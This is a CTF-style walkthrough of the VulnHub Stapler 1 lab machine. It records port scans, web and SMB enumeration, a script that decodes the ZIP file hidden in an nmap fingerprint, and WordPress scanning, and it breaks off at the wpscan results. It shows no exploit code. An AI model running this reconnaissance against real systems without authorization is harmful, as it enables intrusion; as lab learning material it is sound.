VulnHub Stapler 1 notes
Stapler 1
Service enumeration
# nmap -p- 10.10.10.14
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-11 22:42 EDT
Nmap scan report for 10.10.10.14
Host is up (0.00075s latency).
Not shown: 65523 filtered ports
PORT      STATE  SERVICE
20/tcp    closed ftp-data
21/tcp    open   ftp
22/tcp    open   ssh
53/tcp    open   domain
80/tcp    open   http
123/tcp   closed ntp
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn
666/tcp   open   doom
3306/tcp  open   mysql
12380/tcp open   unknown
MAC Address: 08:00:27:ED:2F:88 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 117.87 seconds

# nmap -Pn -p20,21,22,53,80,123,137,138,139,666,3306,12380 -sV --version-all 10.10.10.14
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-11 22:46 EDT
Nmap scan report for 10.10.10.14
Host is up (0.00049s latency).

PORT      STATE  SERVICE     VERSION
20/tcp    closed ftp-data
21/tcp    open   ftp         vsftpd 2.0.8 or later
22/tcp    open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
53/tcp    open   domain      dnsmasq 2.75
80/tcp    open   http        PHP cli server 5.5 or later
123/tcp   closed ntp
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
666/tcp   open   doom?
3306/tcp  open   mysql       MySQL 5.7.12-0ubuntu1
12380/tcp open   http        Apache httpd 2.4.18 ((Ubuntu))
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port666-TCP:V=7.80%I=9%D=5/11%Time=5EBA0DFF%P=x86_64-pc-linux-gnu%r(NUL
SF:L,1350,"PK\x03\x04\x14\0\x02\0\x08\0d\x80\xc3Hp\xdf\x15\x81\xaa,\0\0\x1
SF:52\0\0\x0c\0\x1c\0message2\.jpgUT\t\0\x03\+\x9cQWJ\x9cQWux\x0b\0\x01\x0
SF:4\xf5\x01\0\0\x04\x14\0\0\0\xadz\x0bT\x13\xe7\xbe\xefP\x94\x88\x88A@\xa
SF:2\x20\x19\xabUT\xc4T\x11\xa9\x102>\x8a\xd4RDK\x15\x85Jj\xa9\"DL\[E\xa2\
SF:x0c\x19\x140<\xc4\xb4\xb5\xca\xaen\x89\x8a\x8aV\x11\x91W\xc5H\x20\x0f\x
SF:b2\xf7\xb6\x88\n\x82@%\x99d\xb7\xc8#;3\[\r_\xcddr\x87\xbd\xcf9\xf7\xaeu
SF:\xeeY\xeb\xdc\xb3oX\xacY\xf92\xf3e\xfe\xdf\xff\xff\xff=2\x9f\xf3\x99\xd
SF:3\x08y}\xb8a\xe3\x06\xc8\xc5\x05\x82>`\xfe\x20\xa7\x05:\xb4y\xaf\xf8\xa
SF:0\xf8\xc0\^\xf1\x97sC\x97\xbd\x0b\xbd\xb7nc\xdc\xa4I\xd0\xc4\+j\xce\[\x
SF:87\xa0\xe5\x1b\xf7\xcc=,\xce\x9a\xbb\xeb\xeb\xdds\xbf\xde\xbd\xeb\x8b\x
SF:f4\xfdis\x0f\xeeM\?\xb0\xf4\x1f\xa3\xcceY\xfb\xbe\x98\x9b\xb6\xfb\xe0\x
SF:dc\]sS\xc5bQ\xfa\xee\xb7\xe7\xbc\x05AoA\x93\xfe9\xd3\x82\x7f\xcc\xe4\xd
SF:5\x1dx\xa2O\x0e\xdd\x994\x9c\xe7\xfe\x871\xb0N\xea\x1c\x80\xd63w\xf1\xa
SF:f\xbd&&q\xf9\x97'i\x85fL\x81\xe2\\\xf6\xb9\xba\xcc\x80\xde\x9a\xe1\xe2:
SF:\xc3\xc5\xa9\x85`\x08r\x99\xfc\xcf\x13\xa0\x7f{\xb9\xbc\xe5:i\xb2\x1bk\
SF:x8a\xfbT\x0f\xe6\x84\x06/\xe8-\x17W\xd7\xb7&\xb9N\x9e<\xb1\\\.\xb9\xcc\
SF:xe7\xd0\xa4\x19\x93\xbd\xdf\^\xbe\xd6\xcdg\xcb\.\xd6\xbc\xaf\|W\x1c\xfd
SF:\xf6\xe2\x94\xf9\xebj\xdbf~\xfc\x98x'\xf4\xf3\xaf\x8f\xb9O\xf5\xe3\xcc\
SF:x9a\xed\xbf`a\xd0\xa2\xc5KV\x86\xad\n\x7fou\xc4\xfa\xf7\xa37\xc4\|\xb0\
SF:xf1\xc3\x84O\xb6nK\xdc\xbe#\)\xf5\x8b\xdd{\xd2\xf6\xa6g\x1c8\x98u\(\[r\
SF:xf8H~A\xe1qYQq\xc9w\xa7\xbe\?}\xa6\xfc\x0f\?\x9c\xbdTy\xf9\xca\xd5\xaak
SF:\xd7\x7f\xbcSW\xdf\xd0\xd8\xf4\xd3\xddf\xb5F\xabk\xd7\xff\xe9\xcf\x7fy\
SF:xd2\xd5\xfd\xb4\xa7\xf7Y_\?n2\xff\xf5\xd7\xdf\x86\^\x0c\x8f\x90\x7f\x7f
SF:\xf9\xea\xb5m\x1c\xfc\xfef\"\.\x17\xc8\xf5\?B\xff\xbf\xc6\xc5,\x82\xcb\
SF:[\x93&\xb9NbM\xc4\xe5\xf2V\xf6\xc4\t3&M~{\xb9\x9b\xf7\xda-\xac\]_\xf9\x
SF:cc\[qt\x8a\xef\xbao/\xd6\xb6\xb9\xcf\x0f\xfd\x98\x98\xf9\xf9\xd7\x8f\xa
SF:7\xfa\xbd\xb3\x12_@N\x84\xf6\x8f\xc8\xfe{\x81\x1d\xfb\x1fE\xf6\x1f\x81\
SF:xfd\xef\xb8\xfa\xa1i\xae\.L\xf2\\g@\x08D\xbb\xbfp\xb5\xd4\xf4Ym\x0bI\x9
SF:6\x1e\xcb\x879-a\)T\x02\xc8\$\x14k\x08\xae\xfcZ\x90\xe6E\xcb<C\xcap\x8f
SF:\xd0\x8f\x9fu\x01\x8dvT\xf0'\x9b\xe4ST%\x9f5\x95\xab\rSWb\xecN\xfb&\xf4
SF:\xed\xe3v\x13O\xb73A#\xf0,\xd5\xc2\^\xe8\xfc\xc0\xa7\xaf\xab4\xcfC\xcd\
SF:x88\x8e}\xac\x15\xf6~\xc4R\x8e`wT\x96\xa8KT\x1cam\xdb\x99f\xfb\n\xbc\xb
SF:cL}AJ\xe5H\x912\x88\(O\0k\xc9\xa9\x1a\x93\xb8\x84\x8fdN\xbf\x17\xf5\xf0
SF:\.npy\.9\x04\xcf\x14\x1d\x89Rr9\xe4\xd2\xae\x91#\xfbOg\xed\xf6\x15\x04\
SF:xf6~\xf1\]V\xdcBGu\xeb\xaa=\x8e\xef\xa4HU\x1e\x8f\x9f\x9bI\xf4\xb6GTQ\x
SF:f3\xe9\xe5\x8e\x0b\x14L\xb2\xda\x92\x12\xf3\x95\xa2\x1c\xb3\x13\*P\x11\
SF:?\xfb\xf3\xda\xcaDfv\x89`\xa9\xe4k\xc4S\x0e\xd6P0");
MAC Address: 08:00:27:ED:2F:88 (Oracle VirtualBox virtual NIC)
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.38 seconds
I can see what looks like a zip binary in there, but I have no idea how to convert it.
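nmap prints an unrecognized response as an escaped match pattern, so it can be turned back into bytes mechanically. As an added example (not from the original post), the Python below decodes that escaping and then parses the ZIP local file header the bytes begin with; the embedded snippet is the first four fingerprint lines from the scan above, and the modification date it recovers (2016-06-03) agrees with what exiftool reports for message2.jpg further down.

```python
import re
import struct

# First four lines of the port-666 fingerprint copied from the nmap output above
# (the real fingerprint is much longer; this is enough to read the ZIP header).
SF_SNIPPET = r"""SF-Port666-TCP:V=7.80%I=9%D=5/11%Time=5EBA0DFF%P=x86_64-pc-linux-gnu%r(NUL
SF:L,1350,"PK\x03\x04\x14\0\x02\0\x08\0d\x80\xc3Hp\xdf\x15\x81\xaa,\0\0\x1
SF:52\0\0\x0c\0\x1c\0message2\.jpgUT\t\0\x03\+\x9cQWJ\x9cQWux\x0b\0\x01\x0
SF:4\xf5\x01\0\0\x04\x14\0\0\0\xadz\x0bT\x13\xe7\xbe\xefP\x94\x88\x88A@\xa"""


def join_sf_lines(text: str) -> str:
    """Glue nmap's wrapped fingerprint lines together (continuations start with 'SF:')."""
    parts = []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("SF-Port"):
            parts.append(line)
        elif line.startswith("SF:"):
            parts.append(line[3:])
    return "".join(parts)


def unescape_nmap(s: str) -> bytes:
    """Turn nmap's escaped response text back into the raw bytes the service sent.

    nmap writes non-printable bytes as \\xHH (NUL as \\0, plus \\n \\r \\t) and
    backslash-escapes quotes and regex metacharacters because the same text is
    used as a match pattern. Decoding stops at the first unescaped quote (end of
    the response) or at an escape cut off by the end of the snippet.
    """
    out = bytearray()
    i = 0
    while i < len(s):
        c = s[i]
        if c == '"':
            break
        if c != "\\":
            out.append(ord(c))
            i += 1
            continue
        if i + 1 >= len(s):
            break                       # trailing backslash: truncated
        nxt = s[i + 1]
        if nxt == "x":
            hexpart = s[i + 2:i + 4]
            if len(hexpart) < 2:
                break                   # "\xH" cut off at end of snippet
            out.append(int(hexpart, 16))
            i += 4
        elif nxt in "0nrt":
            out.append({"0": 0, "n": 10, "r": 13, "t": 9}[nxt])
            i += 2
        else:
            out.append(ord(nxt))        # \. \[ \+ \" \\ ... -> the literal character
            i += 2
    return bytes(out)


def first_response(fingerprint_text: str):
    """Return (probe_name, decoded_bytes) for the first %r(probe,len,"...") entry."""
    joined = join_sf_lines(fingerprint_text)
    m = re.search(r'%r\(([A-Za-z0-9_]+),([0-9A-Fa-f]+),"', joined)
    if not m:
        raise ValueError("no probe response found")
    return m.group(1), unescape_nmap(joined[m.end():])


def parse_zip_local_header(data: bytes) -> dict:
    """Parse the ZIP local file header (PK\\x03\\x04) at the start of data."""
    if len(data) < 30 or data[:4] != b"PK\x03\x04":
        raise ValueError("not a ZIP local file header")
    (ver, flags, method, mtime, mdate, crc,
     csize, usize, fnlen, exlen) = struct.unpack_from("<HHHHHIIIHH", data, 4)
    name = data[30:30 + fnlen].decode("ascii", "replace")
    # MS-DOS date word: bits 9-15 = year - 1980, bits 5-8 = month, bits 0-4 = day
    mod_date = (1980 + (mdate >> 9), (mdate >> 5) & 0xF, mdate & 0x1F)
    return {"filename": name, "method": method, "flags": flags, "crc32": crc,
            "compressed_size": csize, "uncompressed_size": usize,
            "mod_date": mod_date, "extra_len": exlen, "version_needed": ver}


if __name__ == "__main__":
    probe, raw = first_response(SF_SNIPPET)
    print(probe, raw[:4], parse_zip_local_header(raw))
```

Method 8 is deflate and the uncompressed size of 12821 bytes is the "13 kB" exiftool later shows for message2.jpg.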
Points of interest
- [port 21] ftp vsftpd 2.0.8 or later
- [port 22] ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
- [port 53] domain dnsmasq 2.75
- [port 80] http PHP cli server 5.5 or later
- [port 139] netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
- [port 666] open doom?
- [port 3306] mysql MySQL 5.7.12-0ubuntu1
- [port 12380] http Apache httpd 2.4.18 (Ubuntu)
First time I've had a service detected outside the well-known ports.
doom?
Details
[port 21] ftp vsftpd 2.0.8 or later
Unusually, the FTP version is ambiguous this time.
# ftp 10.10.10.14
Connected to 10.10.10.14.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220
Name (10.10.10.14:root):
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.
ftp> ls
530 Please login with USER and PASS.
ftp: bind: Address already in use
ftp> exit
221 Goodbye.
FTP login failed, but there is something that looks like a hint in the banner.
[port 22] ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
User enumeration didn't tell me anything either.
[port 53] domain dnsmasq 2.75
I have no idea how to approach a DNS server.
# searchsploit dnsmasq
-------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                |  Path
                                                              | (/usr/share/exploitdb/)
-------------------------------------------------------------- ----------------------------------------
Dnsmasq < 2.50 - Heap Overflow / Null Pointer Dereference     | exploits/windows/dos/9617.txt
Dnsmasq < 2.78 - 2-byte Heap Overflow                         | exploits/multiple/dos/42941.py
Dnsmasq < 2.78 - Heap Overflow                                | exploits/multiple/dos/42942.py
Dnsmasq < 2.78 - Information Leak                             | exploits/multiple/dos/42944.py
Dnsmasq < 2.78 - Integer Underflow                            | exploits/multiple/dos/42946.py
Dnsmasq < 2.78 - Lack of free() Denial of Service             | exploits/multiple/dos/42945.py
Dnsmasq < 2.78 - Stack Overflow                               | exploits/multiple/dos/42943.py
Web Interface for DNSmasq / Mikrotik - SQL Injection          | exploits/php/webapps/39817.php
dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC) | exploits/linux/dos/48301.py
-------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
Probably nothing here?
[port 80] http PHP cli server 5.5 or later
An HTTP server served by PHP itself feels unusual.
# nikto -h 10.10.10.14
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.14
+ Target Hostname:    10.10.10.14
+ Target Port:        80
+ Start Time:         2020-05-11 23:29:07 (GMT-4)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information.
+ OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 20 error(s) and 5 item(s) reported on remote host
+ End Time:           2020-05-11 23:29:31 (GMT-4) (24 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
There's a .bashrc and the like, so is the server running out of a user's home directory?
# dirb http://10.10.10.14

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon May 11 23:33:56 2020
URL_BASE: http://10.10.10.14/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.14/ ----
+ http://10.10.10.14/.bashrc (CODE:200|SIZE:3771)
+ http://10.10.10.14/.profile (CODE:200|SIZE:675)

-----------------
END_TIME: Mon May 11 23:34:07 2020
DOWNLOADED: 4612 - FOUND: 2
For now, .bashrc is the one that interests me.
$ cat bashrc
# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples

# If not running interactively, don't do anything
case $- in
    *i*) ;;
      *) return;;
esac

# don't put duplicate lines or lines starting with space in the history.
# See bash(1) for more options
HISTCONTROL=ignoreboth

# append to the history file, don't overwrite it
shopt -s histappend

# for setting history length see HISTSIZE and HISTFILESIZE in bash(1)
HISTSIZE=1000
HISTFILESIZE=2000

# check the window size after each command and, if necessary,
# update the values of LINES and COLUMNS.
shopt -s checkwinsize

# If set, the pattern "**" used in a pathname expansion context will
# match all files and zero or more directories and subdirectories.
#shopt -s globstar

# make less more friendly for non-text input files, see lesspipe(1)
[ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"

# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "${debian_chroot:-}" ] && [ -r /etc/debian_chroot ]; then
    debian_chroot=$(cat /etc/debian_chroot)
fi

# set a fancy prompt (non-color, unless we know we "want" color)
case "$TERM" in
    xterm-color|*-256color) color_prompt=yes;;
esac

# uncomment for a colored prompt, if the terminal has the capability; turned
# off by default to not distract the user: the focus in a terminal window
# should be on the output of commands, not on the prompt
#force_color_prompt=yes

if [ -n "$force_color_prompt" ]; then
    if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then
        # We have color support; assume it's compliant with Ecma-48
        # (ISO/IEC-6429). (Lack of such support is extremely rare, and such
        # a case would tend to support setf rather than setaf.)
        color_prompt=yes
    else
        color_prompt=
    fi
fi

if [ "$color_prompt" = yes ]; then
    PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
else
    PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
fi
unset color_prompt force_color_prompt

# If this is an xterm set the title to user@host:dir
case "$TERM" in
xterm*|rxvt*)
    PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1"
    ;;
*)
    ;;
esac

# enable color support of ls and also add handy aliases
if [ -x /usr/bin/dircolors ]; then
    test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
    alias ls='ls --color=auto'
    #alias dir='dir --color=auto'
    #alias vdir='vdir --color=auto'

    alias grep='grep --color=auto'
    alias fgrep='fgrep --color=auto'
    alias egrep='egrep --color=auto'
fi

# colored GCC warnings and errors
#export GCC_COLORS='error=01;31:warning=01;35:note=01;36:caret=01;32:locus=01:quote=01'

# some more ls aliases
alias ll='ls -alF'
alias la='ls -A'
alias l='ls -CF'

# Add an "alert" alias for long running commands.  Use like so:
#   sleep 10; alert
alias alert='notify-send --urgency=low -i "$([ $? = 0 ] && echo terminal || echo error)" "$(history|tail -n1|sed -e '\''s/^\s*[0-9]\+\s*//;s/[;&|]\s*alert$//'\'')"'

# Alias definitions.
# You may want to put all your additions into a separate file like
# ~/.bash_aliases, instead of adding them here directly.
# See /usr/share/doc/bash-doc/examples in the bash-doc package.

if [ -f ~/.bash_aliases ]; then
    . ~/.bash_aliases
fi

# enable programmable completion features (you don't need to enable
# this, if it's already enabled in /etc/bash.bashrc and /etc/profile
# sources /etc/bash.bashrc).
if ! shopt -oq posix; then
  if [ -f /usr/share/bash-completion/bash_completion ]; then
    . /usr/share/bash-completion/bash_completion
  elif [ -f /etc/bash_completion ]; then
    . /etc/bash_completion
  fi
fi
I've seen chroot vulnerabilities before, so there might be something there.
And while I'm at it, .profile:
$ cat profile
# ~/.profile: executed by the command interpreter for login shells.
# This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login
# exists.
# see /usr/share/doc/bash/examples/startup-files for examples.
# the files are located in the bash-doc package.

# the default umask is set in /etc/profile; for setting the umask
# for ssh logins, install and configure the libpam-umask package.
#umask 022

# if running bash
if [ -n "$BASH_VERSION" ]; then
    # include .bashrc if it exists
    if [ -f "$HOME/.bashrc" ]; then
        . "$HOME/.bashrc"
    fi
fi

# set PATH so it includes user's private bin if it exists
if [ -d "$HOME/bin" ] ; then
    PATH="$HOME/bin:$PATH"
fi
Either way, these don't look useful unless I can get a shell. I couldn't find a usable vulnerability in the PHP CLI server either, so this looks like a dead end.
[port 139] netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
# enum4linux 10.10.10.14
(snip)
 ======================================================================
|    Users on 10.10.10.14 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-864226560-67800430-3082388513
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
(snip)
S-1-22-1-1000 Unix User\peter (Local User)
S-1-22-1-1001 Unix User\RNunemaker (Local User)
S-1-22-1-1002 Unix User\ETollefson (Local User)
S-1-22-1-1003 Unix User\DSwanger (Local User)
S-1-22-1-1004 Unix User\AParnell (Local User)
S-1-22-1-1005 Unix User\SHayslett (Local User)
S-1-22-1-1006 Unix User\MBassin (Local User)
S-1-22-1-1007 Unix User\JBare (Local User)
S-1-22-1-1008 Unix User\LSolum (Local User)
S-1-22-1-1009 Unix User\IChadwick (Local User)
S-1-22-1-1010 Unix User\MFrei (Local User)
S-1-22-1-1011 Unix User\SStroud (Local User)
S-1-22-1-1012 Unix User\CCeaser (Local User)
S-1-22-1-1013 Unix User\JKanode (Local User)
S-1-22-1-1014 Unix User\CJoo (Local User)
S-1-22-1-1015 Unix User\Eeth (Local User)
S-1-22-1-1016 Unix User\LSolum2 (Local User)
S-1-22-1-1017 Unix User\JLipps (Local User)
S-1-22-1-1018 Unix User\jamie (Local User)
S-1-22-1-1019 Unix User\Sam (Local User)
S-1-22-1-1020 Unix User\Drew (Local User)
S-1-22-1-1021 Unix User\jess (Local User)
S-1-22-1-1022 Unix User\SHAY (Local User)
S-1-22-1-1023 Unix User\Taylor (Local User)
S-1-22-1-1024 Unix User\mel (Local User)
S-1-22-1-1025 Unix User\kai (Local User)
S-1-22-1-1026 Unix User\zoe (Local User)
S-1-22-1-1027 Unix User\NATHAN (Local User)
S-1-22-1-1028 Unix User\www (Local User)
S-1-22-1-1029 Unix User\elly (Local User)
(snip)
Unfortunately I couldn't determine the Samba version, but I did find a lot of users. That's it for this port. Metasploit would probably open things up, but I'd rather not lean on it too much.
[port 666] open doom?
doom?
Looked it up, and is this really the protocol for the game DOOM?
Seriously?
I searched for an exploit anyway but found nothing.
Come to think of it, that mystery binary that showed up in the nmap scan came from port 666.
Opening port 666 in Firefox shows garbled characters, and curl complained that it can't handle HTTP 0.9.
No choice but to download it with Firefox. I saved it under the name data.zip and:
# file data.zip
data.zip: Zip archive data, at least v2.0 to extract
A zip after all.
# unzip data.zip
Archive:  data.zip
  inflating: message2.jpg
# file message2.jpg
message2.jpg: JPEG image data, JFIF standard 1.01, aspect ratio, density 72x72, segment length 16, baseline, precision 8, 364x77, components 3
Viewing the image shows:
~$ echo Hello World.
Hello World.
~$
~$ echo Scott, please change this message
segmentation fault
...a cryptic message. Hmm.
# exiftool message2.jpg
ExifTool Version Number         : 11.94
File Name                       : message2.jpg
Directory                       : .
File Size                       : 13 kB
File Modification Date/Time     : 2016:06:03 11:03:07-04:00
File Access Date/Time           : 2020:05:12 00:22:45-04:00
File Inode Change Date/Time     : 2020:05:12 00:22:21-04:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 72
Y Resolution                    : 72
Current IPTC Digest             : 020ab2da2a37c332c141ebf819e37e6d
Contact                         : If you are reading this, you should get a cookie!
Application Record Version      : 4
IPTC Digest                     : d41d8cd98f00b204e9800998ecf8427e
Image Width                     : 364
Image Height                    : 77
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
Image Size                      : 364x77
Megapixels                      : 0.028
Cookie? It might be a big hint, but I have no idea what cookie it means.
[port 3306] mysql MySQL 5.7.12-0ubuntu1
Nothing so far has given me a MySQL clue, so I couldn't log in.
[port 12380] http Apache httpd 2.4.18 (Ubuntu)
# nikto -h 10.10.10.14 -p 12380
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.14
+ Target Hostname:    10.10.10.14
+ Target Port:        12380
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
                   Issuer:   /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time:         2020-05-12 00:47:44 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Hostname '10.10.10.14' does not match certificate's names: Red.Initech
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 8019 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2020-05-12 00:52:42 (GMT-4) (298 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
A generous haul, enough to make me wonder what all the earlier agonizing was for.
# dirb http://10.10.10.14:12380

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Tue May 12 00:54:06 2020
URL_BASE: http://10.10.10.14:12380/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.14:12380/ ----

-----------------
END_TIME: Tue May 12 00:55:14 2020
DOWNLOADED: 4612 - FOUND: 0
Maybe it's about time I moved on from dirb.
So, let's start by checking robots.txt.
Opening port 12380 in Firefox.
A page with a WordPress-looking design came back.
But robots.txt didn't display; the homepage came back instead.
Why?
No choice but to go through /admin112233/, /blogblog/, and /phpmyadmin/ instead.
The homepage came back again.
Whatever I request, it seems to consider it its mission to return nothing but the homepage.
Why?!
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
                   Issuer:   /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time:         2020-05-12 00:47:44 (GMT-4)
---------------------------------------------------------------------------
Come to think of it, the nikto output had this in it.
Strange, it's not HTTPS... or is it...?
That's it.
# curl -k https://10.10.10.14:12380/robots.txt
User-agent: *
Disallow: /admin112233/
Disallow: /blogblog/
Over HTTPS, Firefox can now show pages other than the homepage too.
With curl the certificate doesn't verify, so to force the connection anyway use the -k option.
Once again, going through /admin112233/, /blogblog/, and /phpmyadmin/.
Looking at /admin112233/:
This could of been a BeEF-XSS hook;)
is shown in what looks like an alert().
Not sure what it's getting at; maybe somebody was using beef-xss.
Looking at /admin112233/, a WordPress-looking blog is displayed.
Mindlessly tried logging in with admin/admin, but it didn't work.
Finally time for wpscan to properly earn its keep.
# wpscan --disable-tls-checks --url https://10.10.10.14:12380/blogblog -e at,ap,u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.1
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]n
[+] URL: https://10.10.10.14:12380/blogblog/ [10.10.10.14]
[+] Started: Tue May 12 03:34:51 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.18 (Ubuntu)
 |  - Dave: Soemthing doesn't look right here
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: https://10.10.10.14:12380/blogblog/xmlrpc.php
 | Found By: Headers (Passive Detection)
 | Confidence: 100%
 | Confirmed By:
 |  - Link Tag (Passive Detection), 30% confidence
 |  - Direct Access (Aggressive Detection), 100% confidence
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] https://10.10.10.14:12380/blogblog/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Registration is enabled: https://10.10.10.14:12380/blogblog/wp-login.php?action=register
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: https://10.10.10.14:12380/blogblog/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: https://10.10.10.14:12380/blogblog/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.2.1 identified (Insecure, released on 2015-04-27).
 | Found By: Rss Generator (Passive Detection)
 |  - https://10.10.10.14:12380/blogblog/?feed=rss2, <generator>http://wordpress.org/?v=4.2.1</generator>
